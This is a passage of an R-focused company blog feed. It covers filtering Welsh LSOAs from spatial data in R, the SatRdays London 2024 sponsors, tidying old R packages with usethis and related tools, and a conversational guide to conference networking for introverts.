&lt;p&gt;We can see that only the LSOAs that overlap with the polygon of Wales
have been read in. Note that spatial intersection can be a little bit
&lt;a href="https://r.geocompx.org/spatial-operations#topological-relations" rel="external"&gt;&lt;em&gt;complicated&lt;/em&gt;&lt;/a&gt;.
We’ve actually read in some English LSOAs along the Wales/England border
in addition to the Welsh LSOAs because these technically overlap with
the Wales polygon on the border itself. So it’s not perfect, but as a
tool for selecting the rows of interest before reading them into R’s
memory, it’s still pretty handy.&lt;/p&gt;
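&lt;p&gt;If you only want the Welsh LSOAs, one option is to tidy up after the read. The sketch below assumes the layer has an &lt;code&gt;LSOA21CD&lt;/code&gt; column holding the ONS area codes (an assumption on our part, so check the column names in your own file). Welsh codes begin with &amp;ldquo;W&amp;rdquo;, so a simple prefix filter should drop the English LSOAs along the border.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;library(sf)

# Assumes `wales_lsoa` was read in as above and has an LSOA21CD column
# (hypothetical here; confirm with names(wales_lsoa))
is_welsh = startsWith(as.character(wales_lsoa$LSOA21CD), &amp;quot;W&amp;quot;)

# Logical row subsetting keeps the geometry column, so the result is still an sf object
wales_only = wales_lsoa[is_welsh, ]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The filter runs in R&amp;rsquo;s memory, but only on the rows that &lt;code&gt;wkt_filter&lt;/code&gt; already let through, so it should be cheap.&lt;/p&gt;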
&lt;p&gt;For another great example of using Spatial SQL to read in data
efficiently, check out this nice &lt;a href="https://jayrobwilliams.com/posts/2020/09/spatial-sql" rel="external"&gt;blog
post&lt;/a&gt; by Rob
Williams.&lt;/p&gt;
&lt;p&gt;Hopefully these quick tips will help you the next time you’re working
with spatial data. If you want to learn more, check out our course on
&lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;Spatial Data Analysis with R&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Sponsors</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/</link><pubDate>Tue, 19 Mar 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;&lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;SatRdays London&lt;/a&gt; wouldn&amp;rsquo;t be possible without our sponsors, so we wanted to take the time to tell you a little bit about them.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t miss out on this great chance to learn from R experts and network with fellow data science enthusiasts! Tickets are on &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;sale now&lt;/a&gt;!&lt;/p&gt;
&lt;h3 id="cusp-london"&gt;&lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;CUSP London is the Centre for Urban Science and Progress based at King&amp;rsquo;s College London, UK. Their mission is to support interdisciplinary research and innovation using Data Science in and for London.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;&lt;img src="cusp-logo@2x.png" alt="CUSP London Logo" style="width: 600px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Find them on X(/Twitter) &lt;a href="https://twitter.com/CuspLondon" rel="external"&gt;@CuspLondon&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="r-consortium"&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The central mission of the R Consortium is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;&lt;img src="r-consortium-logo.png" alt="R Consortium Logo" style="width: 600px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Find them on X(/Twitter) &lt;a href="https://twitter.com/RConsortium" rel="external"&gt;@RConsortium&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="jumping-rivers"&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Jumping Rivers is an analytics company specialising in creating bespoke solutions for modern business problems. Their team of data science and engineering experts come from many different backgrounds, and their wealth of knowledge and experience allows them to think outside the box and solve problems in new and innovative ways.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;&lt;img src="JR_logo_dark.png" alt="Jumping Rivers Logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Find them on X(/Twitter) &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; and Mastodon &lt;a href="https://fosstodon.org/@jumpingrivers" rel="external"&gt;@jumpingrivers@fosstodon.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Spring clean your R packages</title><link>https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/</link><pubDate>Thu, 07 Mar 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Did you know we maintain a number of public R packages on our &lt;a href="https://github.com/jumpingrivers" rel="external"&gt;GitHub page&lt;/a&gt;? Some of these packages were developed way back in 2019. Since then, the standards in R package development have changed a little and we thought it was time to give our packages a little spring clean.&lt;/p&gt;
&lt;p&gt;In this blog post, we&amp;rsquo;ll be using functions from the &lt;a href="https://usethis.r-lib.org/" rel="external"&gt;{usethis} package&lt;/a&gt; to spruce up some of our old packages. We&amp;rsquo;ve chosen five quick improvements which you should be able to implement in 15 minutes or less. Grab your duster and come along.&lt;/p&gt;
&lt;h3 id="rename-master-to-main"&gt;Rename master to main&lt;/h3&gt;
&lt;p&gt;We wrote a whole &lt;a href="https://www.jumpingrivers.com/blog/git-moving-master-to-main/" rel="external"&gt;blog post&lt;/a&gt; on why it&amp;rsquo;s a good idea to move the default branch name from &lt;code&gt;master&lt;/code&gt; to the more neutral name, &lt;code&gt;main&lt;/code&gt;. Luckily, renaming a single repository is straightforward and this one command will basically do everything for you.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;git_default_branch_rename&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="tidy-your-description-file"&gt;Tidy your description file&lt;/h3&gt;
&lt;p&gt;Your &lt;code&gt;DESCRIPTION&lt;/code&gt; file is arguably the most important file in your R package as it defines the purpose of your code and contains important metadata. Take a minute to check that the key fields are still correct, in particular the contact email address, description and any URLs.&lt;/p&gt;
&lt;p&gt;You can then run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_tidy_description&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which will put the fields in a standard order and alphabetise the dependencies. It&amp;rsquo;s looking tidier already. 😌&lt;/p&gt;
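&lt;p&gt;To double-check the key fields mentioned above, base R can read the file for you. This is only a quick sketch, run from the package root; the choice of fields is ours, and any field missing from the file comes back as &lt;code&gt;NA&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# Read selected fields from the DESCRIPTION file in the working directory
fields = c(&amp;quot;Package&amp;quot;, &amp;quot;Title&amp;quot;, &amp;quot;Description&amp;quot;, &amp;quot;URL&amp;quot;, &amp;quot;BugReports&amp;quot;, &amp;quot;Authors@R&amp;quot;)
desc = read.dcf(&amp;quot;DESCRIPTION&amp;quot;, fields = fields)

# Transpose so each field prints on its own row
t(desc)
&lt;/code&gt;&lt;/pre&gt;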
&lt;h3 id="migrate-to-github-actions"&gt;Migrate to GitHub Actions&lt;/h3&gt;
&lt;p&gt;Travis CI used to be the most popular tool for continuous integration in the #RStats community. In recent years, many R package developers have moved away from &lt;a href="https://ropensci.org/blog/2020/11/19/moving-away-travis/" rel="external"&gt;Travis CI&lt;/a&gt; to &lt;a href="https://docs.github.com/en/actions" rel="external"&gt;GitHub Actions&lt;/a&gt;. Dean Attali wrote a &lt;a href="https://deanattali.com/blog/migrating-travis-to-github/" rel="external"&gt;detailed guide&lt;/a&gt; explaining the migration process in full. However, for most simple packages, all we need to do is delete the existing &lt;code&gt;.travis.yml&lt;/code&gt; file, and then run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_github_action&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;check-standard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to set up the standard GitHub action. This action will run &lt;code&gt;R CMD check&lt;/code&gt; using R-latest on Linux, Mac, and Windows. This is a good baseline if you plan on submitting your package to CRAN. It will also add a lovely badge to your &lt;code&gt;README.md&lt;/code&gt; that will show users that your package is passing the check.&lt;/p&gt;
&lt;p&gt;If your R package has tests, you might also want to run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_github_action&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;test-coverage&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which will calculate your test coverage and report to &lt;a href="https://about.codecov.io" rel="external"&gt;codecov.io&lt;/a&gt;.&lt;/p&gt;
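&lt;p&gt;Before pushing, you may also want to look at coverage locally. A minimal sketch, assuming the {covr} package is installed and you are working from the package root:&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# Run the package tests and record which lines they exercise
cov = covr::package_coverage()

# Overall percentage of lines covered
covr::percent_coverage(cov)
&lt;/code&gt;&lt;/pre&gt;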
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-spring-clean-rpkg"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="create-a-hex-sticker"&gt;Create a hex sticker&lt;/h3&gt;
&lt;p&gt;We all know that the most important part of any R package is the hex sticker. If you don&amp;rsquo;t already have one, you can easily create one in R with &lt;a href="https://github.com/GuangchuangYu/hexSticker" rel="external"&gt;{hexSticker}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can choose any image or plot to position on your sticker. You can then customise it by changing the colours, fonts and adding a url.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hexSticker&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sticker&lt;/span&gt;(subplot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;hoover.png&amp;#34;&lt;/span&gt;, s_x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, s_y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;.75&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; h_fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, h_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#516e7a&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;springClean&amp;#34;&lt;/span&gt;, p_size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;jumpingrivers.com&amp;#34;&lt;/span&gt;, u_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#FFFFFF&amp;#34;&lt;/span&gt;, u_size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filename &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sticker.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="sticker.png" alt="A hex sticker for a fictional package, springClean. There is a robot with a vacuum in the middle." style="display: block; margin-left: auto; margin-right: auto; width: 200px"/&gt;
&lt;p&gt;You can add the hex sticker as a logo to your package with another helpful {usethis} function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_logo&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sticker.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="contributing-and-code-of-conduct"&gt;Contributing and Code of Conduct&lt;/h3&gt;
&lt;p&gt;One of the great things about R package development is that it&amp;rsquo;s a team effort. If you want people to contribute to the development of your R packages, you need to tell them &lt;em&gt;how&lt;/em&gt; to contribute. It&amp;rsquo;s also a good idea to add a code of conduct, to set an example of how we should work together.&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we follow the standard contributing and CoC guides that the tidyverse developers use. Again, {usethis} provides functions that make adding these files to your package really easy.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_tidy_contributing&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_coc&lt;/span&gt;(contact &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;hello@jumpingrivers.com&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="get-involved"&gt;Get involved&lt;/h3&gt;
&lt;p&gt;That&amp;rsquo;s it for our quick spring clean. We always welcome new contributors to our R packages. If you have any issues or want to make a PR, head over to our &lt;a href="https://github.com/jumpingrivers" rel="external"&gt;GitHub page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And if we&amp;rsquo;ve inspired you to dust off your old R packages and give them some love, let us know on &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter/X&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>An introvert's guide to networking at a conference</title><link>https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/</link><pubDate>Thu, 29 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
.blog-content h2 {font-size: 1.5em;}
&lt;/style&gt;
&lt;h2 id="uh-oh-conferences-ive-been-trying-not-to-think-about-them-but-i-cant-put-it-off-any-longer"&gt;Uh oh. Conferences. I&amp;rsquo;ve been trying not to think about them, but I can&amp;rsquo;t put it off any longer.&lt;/h2&gt;
&lt;p&gt;That&amp;rsquo;s okay! It might not be too late to book on to the conferences you want to attend. Some will even still have early bird offers available if you&amp;rsquo;re quick.&lt;/p&gt;
&lt;h2 id="oh-thats-not-a-problem-im-already-booked-on-travel-is-arranged-my-talk-is-written-its-just-"&gt;Oh that&amp;rsquo;s not a problem. I&amp;rsquo;m already booked on, travel is arranged, my talk is written. It&amp;rsquo;s just &amp;hellip;&lt;/h2&gt;
&lt;p&gt;&amp;hellip; just what?&lt;/p&gt;
&lt;h2 id="-theres-so-many-people-and-events-my-manager-said-theyre-great-networking-opportunities-so-i-think-shes-expecting-me-to-come-back-with-a-whole-list-of-new-contacts-too"&gt;&amp;hellip; there&amp;rsquo;s so many people and events. My manager said &amp;ldquo;they&amp;rsquo;re great networking opportunities&amp;rdquo; so I think she&amp;rsquo;s expecting me to come back with a whole list of new contacts too.&lt;/h2&gt;
&lt;p&gt;Oh! Well I &lt;em&gt;love&lt;/em&gt; attending conferences. Spending time with interesting people, and meeting new folk leaves me all energised and buzzy. But conferences aren&amp;rsquo;t just for extroverts like me.&lt;/p&gt;
&lt;p&gt;Setting your manager&amp;rsquo;s possible expectations aside for a second, just focus on what you can benefit from when networking: Meeting the people behind interesting projects that could be helpful to you; encountering contacts with interesting job opportunities; finding like-minded people to attend the social events with.&lt;/p&gt;
&lt;p&gt;Maybe I can help you out with a few tips?&lt;/p&gt;
&lt;h2 id="that-would-be-great-how-should-i-prepare"&gt;That would be great! How should I prepare?&lt;/h2&gt;
&lt;p&gt;Before you get there, you can use social media. Conferences often have #hashtags associated with them. If you use social media, posting about the event can be a great, low-stress way to engage with other attendees.&lt;/p&gt;
&lt;p&gt;I often post something like&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;ldquo;Excited to be on my way to Seattle for #positconf2024 ✈️ Anyone else there this year?&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;when I&amp;rsquo;m travelling.&lt;/p&gt;
&lt;p&gt;That way, if someone I already know is attending, we can make plans to meet up and hang out together.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="thats-a-nice-idea-but-what-happens-if-i-dont-already-know-people-who-are-going"&gt;That&amp;rsquo;s a nice idea. But what happens if I don&amp;rsquo;t already know people who are going?&lt;/h2&gt;
&lt;p&gt;Check the event schedule for the conference.
There is often a welcome event aimed at people who are new to the conference.&lt;/p&gt;
&lt;p&gt;The day before the &lt;a href="https://rss.org.uk/training-events/conference-2024/" rel="external"&gt;RSS International Conference&lt;/a&gt;, the Young Statisticians arrange a workshop to help early career statisticians get to know the organisers and make some conference friends before the main event starts.&lt;/p&gt;
&lt;h2 id="sounds-useful-but-im-going-to-encounter-people-at-some-point-and-i-never-know-what-to-say"&gt;Sounds useful. But I&amp;rsquo;m going to encounter people at some point and I never know what to say.&lt;/h2&gt;
&lt;p&gt;First of all, people &lt;em&gt;love&lt;/em&gt; talking about themselves, and they like you for taking an interest and listening to them. Think up and remember a few standard questions that can get the ball rolling and see where the conversation goes from there.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where do you work?&lt;/li&gt;
&lt;li&gt;What parts of the work do you enjoy?&lt;/li&gt;
&lt;li&gt;Did you travel far to get here?&lt;/li&gt;
&lt;li&gt;Did you go to University? Where did you study?&lt;/li&gt;
&lt;li&gt;What&amp;rsquo;s the funniest issue you&amp;rsquo;ve encountered in your work?&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="oh-so-i-just-to-need-to-remember-some-questions-to-ask"&gt;Oh so I just need to remember some questions to ask?&lt;/h2&gt;
&lt;p&gt;Yes, and come up with some nice icebreakers if you can.&lt;/p&gt;
&lt;h2 id="or-nicebreakers-see-what-i-did-there"&gt;Or &lt;em&gt;nicebreakers&lt;/em&gt;. See what I did there?&lt;/h2&gt;
&lt;p&gt;You must be very pleased with yourself.&lt;/p&gt;
&lt;h2 id="i-am-actually"&gt;I am actually.&lt;/h2&gt;
&lt;p&gt;Well don&amp;rsquo;t forget the time will come where you have to introduce yourself in return. A little preparation goes a long way here.&lt;/p&gt;
&lt;p&gt;Prepare a short sentence explaining who you are, what you do and what you&amp;rsquo;re interested in.
At networking events, you&amp;rsquo;ll constantly be asked these questions.
Preparing a two-minute introduction and practising it slowly out loud can help you feel more confident in the moment.&lt;/p&gt;
&lt;p&gt;And it might sound silly, but make a conscious effort to say your name and company slowly when you first introduce yourself.
I find myself saying &amp;ldquo;Hi, I&amp;rsquo;m Rhian and I work for Jumping Rivers&amp;rdquo; so many times that I naturally rush over the words, creating an awkward situation where the other person didn&amp;rsquo;t catch my name.&lt;/p&gt;
&lt;h2 id="so-i-should-rehearse-by-talking-to-myself-the-mirror-like-they-do-on-the-sims"&gt;So I should rehearse by talking to myself in the mirror like they do on &lt;em&gt;The Sims&lt;/em&gt;?&lt;/h2&gt;
&lt;p&gt;If that helps you, sure. It doesn&amp;rsquo;t have to be perfectly scripted, but making a coherent introduction of yourself creates a good first impression.&lt;/p&gt;
&lt;h2 id="when-im-there-wont-everyone-already-know-each-other-already"&gt;When I&amp;rsquo;m there, won&amp;rsquo;t everyone already know each other?&lt;/h2&gt;
&lt;p&gt;Remember, plenty of people go to conferences alone and don&amp;rsquo;t know anyone else attending. If there&amp;rsquo;s a pub quiz, or other team-based social activity, it&amp;rsquo;s okay to turn up by yourself. It&amp;rsquo;s the organisers&amp;rsquo; job to make you feel welcome and help you find others to chat with.&lt;/p&gt;
&lt;p&gt;There are also going to be events such as poster sessions and welcome drinks, where it&amp;rsquo;s entirely normal for anyone to be interacting with new people. The individuals you do meet may go on to introduce you to other people they know at the conference.&lt;/p&gt;
&lt;h2 id="oh-yeah-this-schedule-has-a-few-of-those-sessions-with-free-snacks-and-drinks"&gt;Oh yeah, this schedule has a few of those sessions with free snacks and drinks.&lt;/h2&gt;
&lt;p&gt;Take it easy on the free wine and coffee. It&amp;rsquo;s easy to use alcohol and copious amounts of coffee to boost your networking bravery at the poster session. However, too much caffeine or alcohol can cause social anxiety and leave you feeling queasy the next morning.&lt;/p&gt;
&lt;h2 id="are-you-speaking-from-personal-experience-here"&gt;Are you speaking from personal experience here?&lt;/h2&gt;
&lt;p&gt;Maybe 😳&lt;/p&gt;
&lt;h2 id="what-if-i-dont-drink-alcohol"&gt;What if I don&amp;rsquo;t drink alcohol?&lt;/h2&gt;
&lt;p&gt;There&amp;rsquo;s also no obligation to drink alcohol. Younger generations are increasingly becoming non-drinkers, and most events will have a decent selection of non-alcoholic drinks. Some conferences organise alcohol-free socials too, like an evening walking-tour or a morning run group.&lt;/p&gt;
&lt;h2 id="these-networking-events-sound-busy"&gt;These networking events sound busy.&lt;/h2&gt;
&lt;p&gt;Yes, some of these events can be crowded and noisy. For some people, that can be a bit overwhelming. It&amp;rsquo;s perfectly okay to step outside for fresh air or to sit in a quieter corner to regain some energy. In fact, it can be a good idea, because it&amp;rsquo;s unlikely that you&amp;rsquo;ll be the only person to do this: other like-minded introverts will have the same idea, giving you an opportunity to meet someone new in a quieter location.&lt;/p&gt;
&lt;h2 id="if-theres-alcohol-at-a-session-like-a-pub-quiz-or-a-poster-session-should-i-be-talking-about-business-or-avoiding-work-related-topics"&gt;If there&amp;rsquo;s alcohol at a session, like a pub quiz or a poster session, should I be talking about business or avoiding work-related topics?&lt;/h2&gt;
&lt;p&gt;This is a tricky one. Some people will be aiming to create business connections and opportunities, and some will be in a more relaxed and sociable mode. This is a situation where you have to read the intentions of the other person and adapt.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s totally okay to talk about non-work topics at any point during the conference. Chatting about hobbies and finding common interests is a great way to connect with people. If someone wants to talk to you about a business opportunity, they will likely steer the conversation back to work, and move on if they don&amp;rsquo;t think you can help them. Don&amp;rsquo;t take this personally! People have different reasons for attending conferences.&lt;/p&gt;
&lt;p&gt;It can also depend on the conference. Some massive machine learning and AI expos can be very business focused, whilst smaller academic or programming conferences can have more of a community feel. If you aren&amp;rsquo;t sure about the vibe, you can always ask someone who has attended that conference before.&lt;/p&gt;
&lt;h2 id="how-do-i-maintain-contact-with-the-people-i-meet"&gt;How do I maintain contact with the people I meet?&lt;/h2&gt;
&lt;p&gt;Traditionally, you would exchange business cards. In Japan there&amp;rsquo;s even an etiquette for receiving a business card where you take a moment to admire and study the person&amp;rsquo;s details on the card you&amp;rsquo;ve just received&amp;mdash;they&amp;rsquo;d never take a business card and rush it straight into their wallet alongside countless other business cards to be forgotten.&lt;/p&gt;
&lt;p&gt;But in this modern world, business cards are becoming less common.
So if you don&amp;rsquo;t have cards to hand out, try connecting with them over LinkedIn&amp;mdash;the LinkedIn app allows you to share a &lt;a href="https://www.linkedin.com/help/linkedin/answer/a525286/using-a-linkedin-qr-code-to-connect-with-members" rel="external"&gt;QR code&lt;/a&gt; to link straight to your profile.
Or if either of you doesn&amp;rsquo;t use LinkedIn, you can exchange email addresses.
If the other person agrees, consider taking a selfie with them and emailing it to their address straight away&amp;mdash;not only have you exchanged details, but provided a visual memento and opened a conversation channel for further discussions after the conference.&lt;/p&gt;
